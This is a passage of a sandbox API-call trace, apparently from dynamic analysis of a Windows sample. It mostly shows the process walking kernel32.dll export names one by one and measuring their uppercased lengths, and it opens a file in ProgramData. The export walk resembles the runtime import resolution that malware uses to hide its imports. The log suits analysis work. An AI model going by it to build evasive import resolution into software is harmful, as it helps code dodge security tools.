lpString1=0x239db44, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0178.409] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0178.409] lstrcpyA (in: lpString1=0x239db44, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0178.409] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0178.409] lstrcpyA (in: lpString1=0x239db44, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0178.409] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0178.409] lstrcpyA (in: lpString1=0x239db44, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0178.409] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0178.409] lstrcpyA (in: lpString1=0x239db44, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0178.409] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0178.409] lstrcpyA (in: lpString1=0x239db44, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0178.409] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0178.409] lstrcpyA (in: lpString1=0x239db44, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0178.409] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0178.409] lstrcpyA (in: lpString1=0x239db44, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0178.409] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0178.409] lstrcpyA (in: lpString1=0x239db44, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0178.409] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0178.409] lstrcpyA (in: lpString1=0x239db44, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0178.409] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0178.409] lstrcpyA (in: lpString1=0x239db44, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0178.409] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0178.409] lstrcpyA (in: lpString1=0x239db44, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0178.409] lstrlenA (lpString="BEEP") returned 4 [0178.409] lstrcpyA (in: lpString1=0x239db44, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0178.410] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0178.410] lstrcpyA (in: lpString1=0x239db44, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0178.410] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0178.410] lstrcpyA (in: lpString1=0x239db44, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0178.410] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0178.410] lstrcpyA (in: lpString1=0x239db44, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0178.410] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0178.410] lstrcpyA (in: lpString1=0x239db44, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0178.410] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0178.410] lstrcpyA (in: lpString1=0x239db44, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0178.410] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0178.410] lstrcpyA (in: lpString1=0x239db44, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0178.410] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0178.410] lstrcpyA (in: lpString1=0x239db44, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0178.410] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0178.410] lstrcpyA (in: lpString1=0x239db44, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0178.410] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0178.410] lstrcpyA (in: lpString1=0x239db44, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0178.410] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0178.411] lstrcpyA (in: lpString1=0x239db44, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0178.411] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0178.411] lstrcpyA (in: lpString1=0x239db44, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0178.411] lstrlenA (lpString="CANCELIO") returned 8 [0178.411] lstrcpyA (in: lpString1=0x239db44, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0178.411] lstrlenA (lpString="CANCELIOEX") returned 10 [0178.411] lstrcpyA (in: lpString1=0x239db44, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0178.411] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0178.411] lstrcpyA (in: lpString1=0x239db44, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0178.411] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0178.411] lstrcpyA (in: lpString1=0x239db44, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0178.411] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0178.411] lstrcpyA (in: lpString1=0x239db44, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0178.411] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0178.411] lstrcpyA (in: lpString1=0x239db44, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0178.411] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0178.411] lstrcpyA (in: lpString1=0x239db44, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0178.411] lstrlenA (lpString="CHECKELEVATION") returned 14 [0178.411] lstrcpyA (in: lpString1=0x239db44, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0178.411] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0178.411] lstrcpyA (in: lpString1=0x239db44, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0178.411] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0178.411] lstrcpyA (in: lpString1=0x239db44, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0178.411] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0178.411] lstrcpyA (in: lpString1=0x239db44, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0178.411] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0178.411] lstrcpyA (in: lpString1=0x239db44, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0178.411] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0178.411] lstrcpyA (in: lpString1=0x239db44, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0178.411] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0178.411] lstrcpyA (in: lpString1=0x239db44, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0178.411] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0178.411] lstrcpyA (in: lpString1=0x239db44, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0178.411] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0178.411] lstrcpyA (in: lpString1=0x239db44, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0178.411] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0178.411] lstrcpyA (in: lpString1=0x239db44, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0178.411] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0178.412] lstrcpyA (in: lpString1=0x239db44, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0178.412] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0178.412] lstrcpyA (in: lpString1=0x239db44, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0178.412] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0178.412] lstrcpyA (in: lpString1=0x239db44, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0178.412] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0178.412] lstrcpyA (in: lpString1=0x239db44, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0178.412] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0178.412] lstrcpyA (in: lpString1=0x239db44, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0178.412] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0178.412] lstrcpyA (in: lpString1=0x239db44, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0178.412] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0178.412] lstrcpyA (in: lpString1=0x239db44, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0178.412] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0178.412] lstrcpyA (in: lpString1=0x239db44, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0178.412] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0178.412] lstrcpyA (in: lpString1=0x239db44, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0178.412] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0178.412] lstrcpyA (in: lpString1=0x239db44, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0178.412] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0178.412] lstrcpyA (in: lpString1=0x239db44, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0178.412] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0178.412] lstrcpyA (in: lpString1=0x239db44, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0178.412] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0178.412] lstrcpyA (in: lpString1=0x239db44, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0178.412] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0178.412] lstrcpyA (in: lpString1=0x239db44, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0178.412] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0178.412] lstrcpyA (in: lpString1=0x239db44, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0178.412] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0178.412] lstrcpyA (in: lpString1=0x239db44, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0178.412] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0178.412] lstrcpyA (in: lpString1=0x239db44, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0178.412] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0178.412] lstrcpyA (in: lpString1=0x239db44, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0178.412] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0178.412] lstrcpyA (in: lpString1=0x239db44, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0178.413] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0178.413] lstrcpyA (in: lpString1=0x239db44, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0178.413] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0178.413] lstrcpyA (in: lpString1=0x239db44, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0178.413] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0178.413] lstrcpyA (in: lpString1=0x239db44, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0178.413] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0178.413] lstrcpyA (in: lpString1=0x239db44, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0178.413] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0178.413] lstrcpyA (in: lpString1=0x239db44, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0178.413] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0178.413] lstrcpyA (in: lpString1=0x239db44, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0178.413] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0178.413] lstrcpyA (in: lpString1=0x239db44, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0178.413] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0178.413] lstrcpyA (in: lpString1=0x239db44, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0178.413] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0178.413] lstrcpyA (in: lpString1=0x239db44, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0178.413] lstrlenA (lpString="COPYCONTEXT") returned 11 [0178.413] lstrcpyA (in: lpString1=0x239db44, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0178.413] lstrlenA (lpString="COPYFILEA") returned 9 [0178.413] lstrcpyA (in: lpString1=0x239db44, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0178.413] lstrlenA (lpString="COPYFILEEXA") returned 11 [0178.413] lstrcpyA (in: lpString1=0x239db44, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0178.413] lstrlenA (lpString="COPYFILEEXW") returned 11 [0178.413] lstrcpyA (in: lpString1=0x239db44, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0178.413] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0178.413] lstrcpyA (in: lpString1=0x239db44, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0178.413] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0178.413] lstrcpyA (in: lpString1=0x239db44, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0178.413] lstrlenA (lpString="COPYFILEW") returned 9 [0178.413] lstrcpyA (in: lpString1=0x239db44, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0178.413] lstrlenA (lpString="COPYLZFILE") returned 10 [0178.413] lstrcpyA (in: lpString1=0x239db44, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0178.413] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0178.413] lstrcpyA (in: lpString1=0x239db44, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0178.413] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0178.414] lstrcpyA (in: lpString1=0x239db44, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0178.414] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0178.414] lstrcpyA (in: lpString1=0x239db44, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0178.414] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0178.414] lstrcpyA (in: lpString1=0x239db44, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0178.414] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0178.414] lstrcpyA (in: lpString1=0x239db44, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0178.414] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0178.414] lstrcpyA (in: lpString1=0x239db44, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0178.414] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0178.414] lstrcpyA (in: lpString1=0x239db44, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0178.414] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0178.414] lstrcpyA (in: lpString1=0x239db44, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0178.414] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0178.414] lstrcpyA (in: lpString1=0x239db44, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0178.414] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0178.414] lstrcpyA (in: lpString1=0x239db44, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0178.414] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0178.414] lstrcpyA (in: lpString1=0x239db44, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0178.414] lstrlenA (lpString="CREATEEVENTA") returned 12 [0178.414] lstrcpyA (in: lpString1=0x239db44, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0178.414] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0178.414] lstrcpyA (in: lpString1=0x239db44, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0178.414] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0178.414] lstrcpyA (in: lpString1=0x239db44, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0178.414] lstrlenA (lpString="CREATEEVENTW") returned 12 [0178.414] lstrcpyA (in: lpString1=0x239db44, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0178.414] lstrlenA (lpString="CREATEFIBER") returned 11 [0178.414] lstrcpyA (in: lpString1=0x239db44, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0178.414] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0178.414] lstrcpyA (in: lpString1=0x239db44, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0178.414] lstrlenA (lpString="CREATEFILEA") returned 11 [0178.414] lstrcpyA (in: lpString1=0x239db44, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0178.414] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0178.414] lstrcpyA (in: lpString1=0x239db44, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0178.414] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0178.414] lstrcpyA (in: lpString1=0x239db44, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0178.414] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0178.415] lstrcpyA (in: lpString1=0x239db44, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0178.415] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0178.415] lstrcpyA (in: lpString1=0x239db44, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0178.415] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0178.415] lstrcpyA (in: lpString1=0x239db44, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0178.415] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0178.415] lstrcpyA (in: lpString1=0x239db44, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0178.415] lstrlenA (lpString="CREATEFILEW") returned 11 [0178.415] CreateFileW (lpFileName="C:\\ProgramData\\0x29A.db" (normalized: "c:\\programdata\\0x29a.db"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0178.465] lstrlenA (lpString="kernel32.dll") returned 12 [0178.465] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x77110000 [0178.465] lstrcpyA (in: lpString1=0x239db5c, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0178.465] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0178.465] lstrcpyA (in: lpString1=0x239db5c, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0178.465] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0178.465] lstrcpyA (in: lpString1=0x239db5c, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0178.465] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0178.465] lstrcpyA (in: lpString1=0x239db5c, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0178.465] lstrlenA (lpString="ADDATOMA") returned 8 [0178.465] lstrcpyA (in: lpString1=0x239db5c, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0178.465] lstrlenA (lpString="ADDATOMW") returned 8 [0178.465] lstrcpyA (in: lpString1=0x239db5c, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0178.465] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0178.465] lstrcpyA (in: lpString1=0x239db5c, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0178.465] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0178.466] lstrcpyA (in: lpString1=0x239db5c, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0178.466] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0178.466] lstrcpyA (in: lpString1=0x239db5c, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0178.466] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0178.466] lstrcpyA (in: lpString1=0x239db5c, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0178.466] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0178.466] lstrcpyA (in: lpString1=0x239db5c, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0178.466] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0178.466] lstrcpyA (in: lpString1=0x239db5c, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0178.466] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0178.466] lstrcpyA (in: lpString1=0x239db5c, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0178.466] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0178.466] lstrcpyA (in: lpString1=0x239db5c, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0178.466] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0178.466] lstrcpyA (in: lpString1=0x239db5c, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0178.466] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0178.466] lstrcpyA (in: lpString1=0x239db5c, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0178.466] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0178.466] lstrcpyA (in: lpString1=0x239db5c, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0178.466] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0178.466] lstrcpyA (in: lpString1=0x239db5c, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0178.466] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0178.466] lstrcpyA (in: lpString1=0x239db5c, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0178.466] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0178.466] lstrcpyA (in: lpString1=0x239db5c, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0178.466] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0178.466] lstrcpyA (in: lpString1=0x239db5c, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0178.466] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0178.466] lstrcpyA (in: lpString1=0x239db5c, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0178.466] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0178.466] lstrcpyA (in: lpString1=0x239db5c, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0178.466] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0178.466] lstrcpyA (in: lpString1=0x239db5c, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0178.466] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0178.466] lstrcpyA (in: lpString1=0x239db5c, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0178.466] lstrlenA (lpString="BACKUPREAD") returned 10 [0178.466] lstrcpyA (in: lpString1=0x239db5c, lpString2="BackupSeek" | out: 